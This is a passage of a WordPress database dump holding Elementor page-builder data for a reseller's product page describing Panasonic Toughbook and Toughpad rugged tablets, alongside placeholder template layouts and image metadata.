N1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"57df093\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-n1_mk2_android_image_2_1.jpg\",\"id\":2604}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"380b880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae N1 \\u2014 a powerful, slim and fully rugged handheld. It\\u2019s the all-in-one tool you\\u2019ve been waiting for, and it\\u2019s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you won\\u2019t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Android\\u2122 operating system,\\u00a0giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers\\/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, don\\u2019t worry \\u2014 it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6aba493\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3256f2d\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-X1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b370c19\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/236380_F1X1_Hero.png\",\"id\":2603}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1efa495\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The TOUGHPAD\\u00ae FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.\\u00a0Thirty minutes of under five feet of water rugged.\\u00a0Ten foot drops onto solid concrete rugged. Built-in heater for -4\\u00b0 F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"645131d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5ec8bc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cea0ebe\",\"elType\":\"widget\",\"settings\":{\"title\":\"Tablets\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c92f938\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"bb0c96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e27fe8\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK L1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f6ee69c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-l1_right_ss.jpg\",\"id\":2609}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"636c2cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Android\\u2122 OS based\\u00a07\\\" tablet that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used\\u00a0in the enterprise to collect information from workers in retail stores,\\u00a0warehouses field service, transportation and delivery or many other\\u00a0environments where work must occur belies its mild looking exterior.\\u00a0The TOUGHBOOK L1 has a quad-core processor and optional straight-shooting\\u00a0barcode reader from portrait to landscape, use a stylus pen or connect\\u00a0to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.\\u00a0This tablet\\u2019s users won\\u2019t miss a beat with its great battery life, glove and\\u00a0rain touch enabled 7\\\" screen, 5 foot drop rating and IP65 and IP67\\u00a0certification. The TOUGHBOOK L1 is ready to be used by satisfied end\\u00a0users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d16c223\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":35},\"elements\":[{\"id\":\"ba5591e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-M1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca8b0be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-m1_image_01_new_win10.jpg\",\"id\":2610}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"30fc1f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic FZ-M1 is the fully rugged Windows\\u00ae tablet, built to\\u00a0enable mission-critical mobile worker productivity without compromise. Powered\\u00a0by Windows\\u00ae 10 Pro, the FZ-M1 features a long life, user-replaceable\\u00a0battery and a daylight-readable, high-sensitivity multi-touch display for use\\u00a0with heavy gloves. With the broadest range of configuration options available in\\u00a0its class, the highly customizable FZ-M1 is the ideal tool for today\\u2019s\\u00a0mobile workforce. In addition to the highly configurable options, added models\\u00a0of Thermal Camera, Real Sense Camera, RTK\\/GPS, as well as several more.\\u00a0Allows the FZ-M1 to be the most comprehensive 7\\\" tablet in the market.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ddfa1b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4648e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-G1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca5913e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-g1mk5_us_image02_ss.jpg\",\"id\":2611}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a32d55e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experience\\u00a0while providing crucial port connectivity and feature-rich options in a compact\\u00a0size. Designed for highly mobile field workers, it\\u2019s the thinnest and lightest\\u00a0fully rugged 10.1\\\" tablet running Windows 10 Pro 64-Bit. Powered by an\\u00a0Intel\\u00ae Core\\u2122 i5 vPro\\u2122 processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobile\\u00a0computing. Add to that an HD daylight-readable 10-point gloved multi touch +\\u00a0waterproof digitizer pen, and it becomes an essential tool for field workers.\\u00a0With added Thermal camera and IR camera options.\\u00a0 Can also support \\\"Windows Hello\\\" for enhanced security.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d7ecd2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ae2a70d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b56dd64\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-A2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb7e441\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_fz_a2_hero_front-1.png\",\"id\":2612}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"705b4b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>With the Android 6.0 (Marshmallow) operating system and Intel\\u00ae x5-Z8550 processor, the Panasonic TOUGHPAD\\u00ae A2 10.1-inch fully rugged Android\\u2122 tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPAD\\u00a0FZ-A2 tablet is up to the task.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34adf46\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":47},\"elements\":[{\"id\":\"46a580a\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-B2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3fc0690\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/prod-jtb2-hero.png\",\"id\":2613}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0fedb48\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The rugged, 7-inch Panasonic TOUGHPAD\\u00ae FZ-B2, now powered by Android\\u2122 6.0.1 (Marshmallow) and the latest Intel\\u00ae AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options \\u2013 at a price within reach of any business \\u2013 the TOUGHPAD\\u00a0FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPAD\\u00a0FZ-B2 is built for long-lasting durability where others fail.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3227,2582,'_elementor_edit_mode','builder'),(3228,2582,'_elementor_template_type','post'),(3229,2582,'_wp_page_template','default'),(3230,2582,'_elementor_data','[{\"id\":\"ae611d2\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"6c1132d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f1d32cf\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"bb28663\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d98979d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"19160f9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d190e0f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2664630\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"bebefd6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"75bca61\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"6fff8e6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8c774\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3296fd5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"064d40e\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3d53e2c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3399e7f\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"41b0969\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"401a78e\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3304,2593,'_wp_attached_file','2018/12/tb31_win10.jpg'),(3305,2593,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:519;s:6:\"height\";i:389;s:4:\"file\";s:22:\"2018/12/tb31_win10.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"tb31_win10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"tb31_win10-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"tb31_win10-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:22:\"tb31_win10-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:20:\"tb31_win10-20x15.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3232,2580,'_elementor_version','0.4'),(3234,2580,'_edit_last','1'),(3235,2580,'_hide_page_title',''),(3236,2580,'_hide_header',''),(3237,2580,'_hide_footer',''),(3238,2580,'_hide_breadcrumb',''),(3239,2580,'_cover',''),(3240,2580,'_show_excerpt',''),(3241,2580,'_wc_apply_product',''),(3242,2580,'_yoast_wpseo_content_score','30'),(3243,2583,'_elementor_edit_mode','builder'),(3244,2583,'_elementor_template_type','post'),(3245,2583,'_wp_page_template','template-fullwidth.php'),(3246,2583,'_elementor_data','[{\"id\":\"ae611d2\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"6c1132d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f1d32cf\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"bb28663\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d98979d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"19160f9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d190e0f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2664630\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"bebefd6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"75bca61\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"6fff8e6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8c774\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3296fd5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"064d40e\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3d53e2c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3399e7f\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"41b0969\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"401a78e\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3247,2583,'_elementor_version','0.4'),(3249,2584,'_elementor_edit_mode','builder'),(3250,2584,'_elementor_template_type','post'),(3251,2584,'_wp_page_template','template-fullwidth.php'),(3252,2584,'_elementor_data','[{\"id\":\"ae611d2\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"6c1132d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f1d32cf\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"bb28663\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d98979d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"19160f9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d190e0f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2664630\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"bebefd6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"daaac52\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8a8db84\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"82c4f3e\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"38707b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"496a022\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e7991ca\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce20500\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aed212e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d5a668a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"75bca61\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"6fff8e6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8c774\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3296fd5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"064d40e\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3d53e2c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3399e7f\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"41b0969\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"401a78e\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3253,2584,'_elementor_version','0.4'),(3256,2585,'_elementor_edit_mode','builder'),(3257,2585,'_elementor_template_type','post'),(3258,2585,'_wp_page_template','template-fullwidth.php'),(3259,2585,'_elementor_data','[{\"id\":\"ae611d2\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"6c1132d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f1d32cf\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"bb28663\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d98979d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"19160f9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d190e0f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2664630\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"bebefd6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"daaac52\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8a8db84\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"82c4f3e\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"38707b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"496a022\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e7991ca\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce20500\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aed212e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d5a668a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"75bca61\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"6fff8e6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8c774\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3296fd5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"064d40e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3d53e2c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3399e7f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"41b0969\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"401a78e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3260,2585,'_elementor_version','0.4'),(3273,2587,'_elementor_data','[{\"id\":\"180ee07\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"0cbe142\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"52bc26e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"09417bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be86921\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2a41045\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9db1fee\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text 